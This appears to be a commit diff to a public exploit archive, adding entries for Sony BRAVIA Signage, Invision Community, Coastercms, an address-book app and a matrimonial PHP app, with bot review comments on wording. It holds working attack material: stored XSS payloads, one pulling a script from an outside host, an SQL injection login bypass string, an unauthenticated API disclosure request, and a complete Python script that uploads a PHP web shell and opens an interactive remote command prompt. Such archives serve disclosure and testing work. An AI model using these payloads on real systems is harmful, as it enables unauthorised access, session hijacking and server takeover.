DB: 2020-12-04
9 changes to exploits/shellcodes

Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020
Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Online Matrimonial Project 1.0 - Authenticated Remote Code Execution
Coastercms 5.8.18 - Stored XSS
EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass
mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting
Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion
Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure
Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting
parent 0ffa4d35c4
commit d560e654b7
10 changed files with 349 additions and 2 deletions
69
exploits/hardware/webapps/49186.txt
Normal file
|
@ -0,0 +1,69 @@
|
|||
# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion
|
||||
# Date: 20.09.2020
|
||||
# Exploit Author: LiquidWorm
|
||||
# Vendor Homepage: https://pro-bravia.sony.net
|
||||
# Version: 1.7.8
|
||||
|
||||
Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion
|
||||
|
||||
|
||||
Vendor: Sony Electronics Inc.
|
||||
Product web page: https://pro-bravia.sony.net
|
||||
https://pro-bravia.sony.net/resources/software/bravia-signage/
|
||||
https://pro.sony/ue_US/products/display-software
|
||||
Affected version: <=1.7.8
|
||||
|
||||
Summary: Sony's BRAVIA Signage is an application to deliver
|
||||
video and still images to Pro BRAVIAs and manage the information
|
||||
via a network. Features include management of displays, power
|
||||
schedule management, content playlists, scheduled delivery
|
||||
management, content interrupt, and more. This cost-effective
|
||||
digital signage management solution is ideal for presenting
|
||||
attractive, informative visual content in retail spaces and
|
||||
hotel reception areas, visitor attractions, educational and
|
||||
corporate environments.
|
||||
|
||||
Desc: BRAVIA digital signage is vulnerable to a remote file
|
||||
inclusion (RFI) vulnerability by including arbitrary client-side
|
||||
dynamic scripts (JavaScript, VBScript, HTML) when adding content
|
||||
though the input URL material of type html. This allows hijacking
|
||||
the current session of the user, execute cross-site scripting code
|
||||
or changing the look of the page and content modification on current
|
||||
display.
|
||||
|
||||
Tested on: Microsoft Windows Server 2012 R2
|
||||
Ubuntu
|
||||
NodeJS
|
||||
Express
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5612
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5612.php
|
||||
|
||||
|
||||
20.09.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
Request:
|
||||
--------
|
||||
|
||||
POST /api/content-creation?type=create&id=174ace2f9371b4 HTTP/1.1
|
||||
Host: 192.168.1.20:8080
|
||||
Proxy-Connection: keep-alive
|
||||
Content-Length: 468
|
||||
Accept: application/json, text/plain, */*
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
|
||||
Content-Type: application/json;charset=UTF-8
|
||||
Origin: http://192.168.1.20:8080
|
||||
Referer: http://192.168.1.20:8080/test.txt
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Cookie: io=RslVZVH6Dc8WsOn5AAAJ
|
||||
|
||||
{"material":[{"name":"http://www.zeroscience.mk/pentest/XSS.svg","type":"html"},{"name":"C:\\fakepath\\Blank.jpg","type":"jpeg"},{"name":"","type":"external_input"},{"name":"","type":""}],"layout":{"name":"assets/images/c4e7e66e.icon_layout_pattern_landscape_003.png","area":3,"direction":"landscape","layouts":[{"index":1,"width":960,"height":1080,"x":0,"y":0},{"index":2,"width":960,"height":540,"x":960,"y":0},{"index":3,"width":960,"height":540,"x":960,"y":540}]}}
|
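Review bot: The title and the Desc paragraph call this remote file inclusion, but the behaviour the Desc describes (client-side scripts pulled in from a URL supplied as the "name" of a material with "type":"html", leading to session hijacking, cross-site scripting and altered display content) is stored script and content injection in the signage page; say so in the title or Desc so the entry is classified and mitigated correctly. The title also says "Unauthenticated" while the sample request carries "Cookie: io=RslVZVH6Dc8WsOn5AAAJ"; state whether the endpoint accepts the POST without that cookie. Minor: "though the input URL material" should read "through".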
52
exploits/hardware/webapps/49187.txt
Normal file
|
@ -0,0 +1,52 @@
|
|||
# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure
|
||||
# Date: 20.09.2020
|
||||
# Exploit Author: LiquidWorm
|
||||
# Vendor Homepage: https://pro-bravia.sony.net
|
||||
# Version: 1.7.8
|
||||
|
||||
Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure
|
||||
|
||||
|
||||
Vendor: Sony Electronics Inc.
|
||||
Product web page: https://pro-bravia.sony.net
|
||||
https://pro-bravia.sony.net/resources/software/bravia-signage/
|
||||
https://pro.sony/ue_US/products/display-software
|
||||
Affected version: <=1.7.8
|
||||
|
||||
Summary: Sony's BRAVIA Signage is an application to deliver
|
||||
video and still images to Pro BRAVIAs and manage the information
|
||||
via a network. Features include management of displays, power
|
||||
schedule management, content playlists, scheduled delivery
|
||||
management, content interrupt, and more. This cost-effective
|
||||
digital signage management solution is ideal for presenting
|
||||
attractive, informative visual content in retail spaces and
|
||||
hotel reception areas, visitor attractions, educational and
|
||||
corporate environments.
|
||||
|
||||
Desc: The application is vulnerable to sensitive information
|
||||
disclosure vulnerability. An unauthenticated attacker can
|
||||
visit several API endpoints and disclose information running
|
||||
on the device.
|
||||
|
||||
Tested on: Microsoft Windows Server 2012 R2
|
||||
Ubuntu
|
||||
NodeJS
|
||||
Express
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5610
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php
|
||||
|
||||
|
||||
20.09.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
$ curl http://192.168.1.20:8080/api/system
|
||||
|
||||
{"__v":0,"_id":"5fa1d6ed9446da0b002d678f","version":"1.7.8","contentsServer":{"url":"http://192.168.1.21/joxy/"},"networkInterfaces":{"lo":[{"address":"127.0.0.1","netmask":"255.0.0.0","family":"IPv4","mac":"00:00:00:00:00:00","internal":true}],"eth0":[{"address":"192.168.1.20","netmask":"255.255.255.0","family":"IPv4","mac":"ZE:R0:SC:13:NC:30","internal":false}]},"serverTime":"2020-12-01T20:13:41.069+01:00","os":"Synology","hostIp":"192.168.1.21"}
|
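Review bot: The Desc says an unauthenticated attacker can visit "several API endpoints", but the proof section shows only /api/system; either list the other endpoints that were confirmed or narrow the wording to the one demonstrated. The Desc should also name what the response exposes (version, contentsServer url, networkInterfaces with addresses and MAC, os, hostIp) so the impact is clear without reading the JSON. Wording: "disclose information running on the device" should read "disclose information about the device".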
20
exploits/multiple/webapps/49182.txt
Normal file
|
@ -0,0 +1,20 @@
|
|||
# Exploit Title: EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass
|
||||
# Date: 02-12-2020
|
||||
# Exploit Author: Mayur Parmar(th3cyb3rc0p)
|
||||
# Vendor Homepage: http://egavilanmedia.com
|
||||
# Software Link : http://egavilanmedia.com/egm-address-book/
|
||||
# Version: 1.0
|
||||
# Tested on: PopOS
|
||||
|
||||
Attack Vector:
|
||||
An attacker can gain admin panel access using malicious sql injection queries.
|
||||
|
||||
Steps to reproduce:
|
||||
1. Open admin login page using following URl:
|
||||
-> http://localhost/Address%20Book/login.php
|
||||
|
||||
2. Now put below Payload in both the fields( User ID & Password)
|
||||
Payload: admin' or '1'='1
|
||||
|
||||
3. Server accepted our payload and we bypassed cpanel without any
|
||||
credentials
|
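Review bot: Step 3 says "we bypassed cpanel", but the Attack Vector line and steps 1 and 2 are about the application's own admin login at login.php; change it to "the admin panel" so it does not read as the hosting control panel. The title carries a redundant "Exploit" ("Address Book 1.0 Exploit - SQLi Auth Bypass"), and step 2 names the inputs only as "User ID & Password" without the request parameter names, which a maintainer needs in order to find the query being injected into.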
42
exploits/multiple/webapps/49184.txt
Normal file
File diff suppressed because one or more lines are too long
39
exploits/multiple/webapps/49188.txt
Normal file
|
@ -0,0 +1,39 @@
|
|||
# Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting
|
||||
# Date: 02-12-2020
|
||||
# Exploit Author: Hemant Patidar (HemantSolo)
|
||||
# Vendor Homepage: https://invisioncommunity.com/
|
||||
# Software Link: https://invisioncommunity.com/buy
|
||||
# Version: 4.5.4
|
||||
# Tested on: Windows 10/Kali Linux
|
||||
|
||||
Vulnerable Parameters: Profile - Field Name.
|
||||
|
||||
Steps-To-Reproduce:
|
||||
1. Go to the Invision Community admin page.
|
||||
2. Now go to the Members - MEMBER SETTINGS - Profiles.
|
||||
3. Now click on Add Profile field.
|
||||
4. Put the below payload in Field Name:
|
||||
"<script>alert(123)</script>"
|
||||
5. Now click on Save button.
|
||||
6. The XSS will be triggered.
|
||||
|
||||
|
||||
POST /admin/?app=core&module=membersettings&controller=profiles&tab=profilefields&subnode=1&do=form&parent=3&ajaxValidate=1 HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
Connection: close
|
||||
Content-Length: 660
|
||||
Accept: */*
|
||||
DNT: 1
|
||||
X-Requested-With: XMLHttpRequest
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Origin: https://127.0.0.1
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Dest: empty
|
||||
Referer: https://127.0.0.1/admin/?app=core&module=membersettings&controller=profiles
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
|
||||
Cookie: XYZ
|
||||
|
||||
form_new_activeTab=&form_new_submitted=1&csrfKey=3ffc7a5774ddc0d2a7142d2072191efc&MAX_FILE_SIZE=20971520&pf_title%5B1%5D=%3Cscript%3Ealert(123)%3C%2Fscript%3E&pf_desc%5B1%5D=Test&pf_group_id=3&pf_type=Text&pf_allow_attachments=0&pf_allow_attachments_checkbox=1&pf_content%5B0%5D=&pf_multiple=0&pf_max_input=0&pf_input_format=&pf_member_edit=0&pf_member_edit_checkbox=1&radio_pf_member_hide__empty=1&pf_member_hide=all&radio_pf_topic_hide__empty=1&pf_topic_hide=hide&pf_search_type=loose&pf_search_type_on_off=exact&radio_pf_profile_format__empty=1&pf_profile_format=default&pf_profile_format_custom=&radio_pf_format__empty=1&pf_format=default&pf_format_custom=
|
|
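Review bot: Step 1 starts at "the Invision Community admin page" and the request goes to /admin/?app=core&module=membersettings..., so this needs an administrator session, yet neither the title nor the header fields say so; add the required privilege level so the severity is not overstated. Step 6 ("The XSS will be triggered") should say on which page the stored Field Name is rendered. The sample request also keeps a literal csrfKey value while the cookie is redacted to "XYZ"; redact both consistently.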
@ -5,6 +5,7 @@
|
|||
# Software Link: https://lepton-cms.org/english/download/archive.php
|
||||
# Version: 4.7.0
|
||||
# Tested on: Windows 10/Kali Linux
|
||||
# CVE: CVE-2020-29240
|
||||
|
||||
Stored Cross-site scripting(XSS):
|
||||
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
|
||||
|
|
23
exploits/php/webapps/49181.txt
Normal file
|
@ -0,0 +1,23 @@
|
|||
# Exploit Title: Coastercms 5.8.18 - Stored XSS
|
||||
# Exploit Author: Hardik Solanki
|
||||
# Vendor Homepage: https://www.coastercms.org/
|
||||
# Software Link: https://www.coastercms.org/
|
||||
# Version: 5.8.18
|
||||
# Tested on Windows 10
|
||||
|
||||
XSS IMPACT:
|
||||
1: Steal the cookie
|
||||
2: User redirection to a malicious website
|
||||
|
||||
Vulnerable Parameters: Edit Page tab
|
||||
|
||||
Steps to reproduce:
|
||||
1: Navigate to "http://localhost/admin/login" and log in with
|
||||
admin credentials.
|
||||
2:- Then after login navigates to "Page --> Homepage --> Our Blog" and
|
||||
click on the edit page.
|
||||
3: Then add the payload "<script>alert(123)</script>" & Payload
|
||||
"<h1>test</h1>", and cliock on update button. Saved succesfully.
|
||||
4: Now, click on "View live page" and it will redirect you to the live page
|
||||
at "http://localhost/homepage/blog" and XSS will get stored and
|
||||
trigger on the main home page
|
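Review bot: The header has no "# Date:" line, which the other new entries in this commit carry, and "Vulnerable Parameters: Edit Page tab" names a screen rather than the field that stores the markup; add the date and the field name. Step 1 shows that admin credentials are required, which the title "Stored XSS" does not convey. Typos in step 3: "cliock" and "succesfully"; step 2 is numbered "2:-" where the other steps use "N:".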
94
exploits/php/webapps/49183.py
Executable file
|
@ -0,0 +1,94 @@
|
|||
# Exploit Title: Online Matrimonial Project 1.0 - Authenticated Remote Code Execution
|
||||
# Exploit Author: Valerio Alessandroni
|
||||
# Date: 2020-10-07
|
||||
# Vendor Homepage: https://projectworlds.in/
|
||||
# Software Link: https://projectworlds.in/free-projects/php-projects/online-matrimonial-project-in-php/
|
||||
# Source Link: https://github.com/projectworldsofficial/online-matrimonial-project-in-php
|
||||
# Version: 1.0
|
||||
# Tested On: Server Linux Ubuntu 18.04, Apache2
|
||||
# Version: Python 2.x
|
||||
# Impact: Code Execution
|
||||
# Affected components: Affected move_uploaded_file() function in functions.php file.
|
||||
# Software: Marital - Online Matrimonial Project In PHP version 1.0 suffers from a File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
|
||||
# Attack vector: An authenticated (you can register a user for free) not privileged user is able to upload arbitrary file in the upload form used to send profile pics, if the file is a PHP script, it can be executed.
|
||||
#
|
||||
# Additional information:
|
||||
#
|
||||
# To exploit this vulnerability:
|
||||
# 1) register a not privileged user at /register.php
|
||||
# 2) login in the application /login.php
|
||||
# 3) keep note of the redirect with the GET 'id' parameter /userhome.php?id=[ID]
|
||||
# 4) go to the page /photouploader.php?id=[ID]
|
||||
# 5) upload an arbitrary file in the upload form, in my example, I used a file called shell.php with the content of "<?php system($_GET['cmd']); ?>"
|
||||
# 6) An error will occurr, but the file is correctly uploaded at /profile/[ID]/shell.php
|
||||
# 7) run command system command through /profile/[ID]/shell.php?cmd=[COMMAND]
|
||||
#
|
||||
# How to use it:
|
||||
# python exploit.py [URL] [USERNAME] [PASSWORD]
|
||||
|
||||
|
||||
import requests, sys, urllib, re, time
|
||||
from colorama import Fore, Back, Style
|
||||
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
|
||||
|
||||
def webshell(SERVER_URL, ID, FILE_NAME):
|
||||
try:
|
||||
print(Fore.YELLOW+'[+] '+Fore.RESET+'Connecting to webshell...')
|
||||
time.sleep(1)
|
||||
WEB_SHELL = SERVER_URL+'profile/'+ID+'/'+FILE_NAME
|
||||
getCMD = {'cmd': 'echo ciao'}
|
||||
r2 = requests.get(WEB_SHELL, params=getCMD)
|
||||
status = r2.status_code
|
||||
if status != 200:
|
||||
print(Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
|
||||
r2.raise_for_status()
|
||||
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
|
||||
while True:
|
||||
|
||||
inputCMD = raw_input('$ ')
|
||||
command = {'cmd': inputCMD}
|
||||
r2 = requests.get(WEB_SHELL, params=command, verify=False)
|
||||
print r2.text
|
||||
except:
|
||||
print("\r\nExiting.")
|
||||
sys.exit(-1)
|
||||
|
||||
def printHeader():
|
||||
print(Fore.GREEN+"___ ___ _ _ _ "+Fore.RED+" ______ _____ _____")
|
||||
print(Fore.GREEN+"| \/ | (_)| | | |"+Fore.RED+" | ___ \/ __ \| ___|")
|
||||
print(Fore.GREEN+"| . . | __ _ _ __ _ | |_ __ _ | |"+Fore.RED+" | |_/ /| / \/| |__ ")
|
||||
print(Fore.GREEN+"| |\/| | / _` || '__|| || __|/ _` || |"+Fore.RED+" | / | | | __| ")
|
||||
print(Fore.GREEN+"| | | || (_| || | | || |_| (_| || |"+Fore.RED+" | |\ \ | \__/\| |___ ")
|
||||
print(Fore.GREEN+"\_| |_/ \__,_||_| |_| \__|\__,_||_|"+Fore.RED+" \_| \_| \____/\____/ ")
|
||||
print ''
|
||||
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
printHeader()
|
||||
if len(sys.argv) != 4:
|
||||
print (Fore.YELLOW+'[+] '+Fore.RESET+"Usage:\t python %s [URL] [USERNAME] [PASSWORD]" % sys.argv[0])
|
||||
print (Fore.YELLOW+'[+] '+Fore.RESET+"Example:\t python %s https://192.168.1.1:443/marital/ Thomas password1234" % sys.argv[0])
|
||||
sys.exit(-1)
|
||||
SERVER_URL = sys.argv[1]
|
||||
SERVER_URI = SERVER_URL + 'auth/auth.php'
|
||||
LOGIN_PARAMS = {'user': '1'}
|
||||
LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'}
|
||||
req = requests.post(SERVER_URI, params=LOGIN_PARAMS, data=LOGIN_DATA, verify=False)
|
||||
print(Fore.YELLOW+'[+] '+Fore.RESET+'logging...')
|
||||
time.sleep(1)
|
||||
for resp in req.history:
|
||||
COOKIES = resp.cookies.get_dict()
|
||||
SPLITTED = resp.headers["location"].split("=")
|
||||
ID = SPLITTED[1]
|
||||
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully retrieved user [ID].')
|
||||
time.sleep(1)
|
||||
SERVER_URI = SERVER_URL + 'photouploader.php'
|
||||
LOGIN_PARAMS = {'id': ID}
|
||||
LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'}
|
||||
FILE_NAME = 'shell.php'
|
||||
FILES = {'pic1': (FILE_NAME, '<?php system($_GET[\'cmd\']); ?>'), 'pic2': ('', ''), 'pic3': ('', ''), 'pic4': ('', '')}
|
||||
req = requests.post(SERVER_URI, params=LOGIN_PARAMS, files=FILES, cookies=COOKIES, verify=False)
|
||||
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully uploaded.')
|
||||
time.sleep(1)
|
||||
webshell(SERVER_URL, ID, FILE_NAME)
|
|
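Review bot: The header carries two "# Version:" lines ("1.0" and "Python 2.x"); the second is the interpreter requirement and should be labelled as such, since the script mixes print(...) calls with the Python 2 only "print r2.text" and raw_input. In the __main__ block, "Successfully retrieved user [ID]." and "Successfully uploaded." are printed without looking at req, so someone running this to confirm a fix sees a success message even when the server rejected the request; report the response status instead. The bare "except:" in webshell() likewise hides the raise_for_status() error behind "Exiting.".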
@ -72,7 +72,7 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|||
|
||||
try:
|
||||
|
||||
print "[*] Testing connection to tatget %s:%s" %(host,port)
|
||||
print "[*] Testing connection to target %s:%s" %(host,port)
|
||||
s.connect((host, port))
|
||||
|
||||
except:
|
||||
|
|
|
@ -43369,7 +43369,8 @@ id,file,description,date,author,type,platform,port
|
|||
49136,exploits/php/webapps/49136.txt,"Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution",2020-12-01,"Saeed Bala Ahmed",webapps,php,
|
||||
49137,exploits/php/webapps/49137.txt,"LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting",2020-12-01,"Sagar Banwa",webapps,php,
|
||||
49138,exploits/php/webapps/49138.txt,"Medical Center Portal Management System 1.0 - 'login' SQL Injection",2020-12-01,"Aydın Baran Ertemir",webapps,php,
|
||||
49139,exploits/php/webapps/49139.txt,"Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020",2020-12-01,"Matthew Aberegg",webapps,php,
|
||||
49139,exploits/php/webapps/49139.txt,"Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2020-12-01,"Matthew Aberegg",webapps,php,
|
||||
49183,exploits/php/webapps/49183.py,"Online Matrimonial Project 1.0 - Authenticated Remote Code Execution",2020-12-03,"Valerio Alessandroni",webapps,php,
|
||||
49140,exploits/php/webapps/49140.txt,"Social Networking Site - Authentication Bypass (SQli)",2020-12-01,gh1mau,webapps,php,
|
||||
49145,exploits/multiple/webapps/49145.txt,"Tendenci 12.3.1 - CSV/ Formula Injection",2020-12-01,"Mufaddal Masalawala",webapps,multiple,
|
||||
49146,exploits/multiple/webapps/49146.txt,"Expense Management System - 'description' Stored Cross Site Scripting",2020-12-02,"Nikhil Kumar",webapps,multiple,
|
||||
|
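Review bot: The new 49183 row is inserted between 49139 and 49140, which breaks the ascending id order the surrounding rows follow; the other rows added in this commit are appended in order at the end of the file, so 49183 belongs there between 49182 and 49184. The 49139 description change (dropping the stray "# Date: 11-14-2020") is fine as is.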
@ -43399,3 +43400,9 @@ id,file,description,date,author,type,platform,port
|
|||
49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
|
||||
49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
|
||||
49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
|
||||
49181,exploits/php/webapps/49181.txt,"Coastercms 5.8.18 - Stored XSS",2020-12-03,"Hardik Solanki",webapps,php,
|
||||
49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple,
|
||||
49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,
|
||||
49186,exploits/hardware/webapps/49186.txt,"Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion",2020-12-03,LiquidWorm,webapps,hardware,
|
||||
49187,exploits/hardware/webapps/49187.txt,"Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure",2020-12-03,LiquidWorm,webapps,hardware,
|
||||
49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,
|
||||
|
|
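Review bot: The description for 49182 keeps the stray word "Exploit" ("EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass"), and 49181 uses "Stored XSS" where the neighbouring new rows spell out "Persistent Cross-Site Scripting" and "Stored Cross-Site Scripting"; normalise both so searches on the description column match. The sequence added here also skips 49183, which this commit places further up next to 49139.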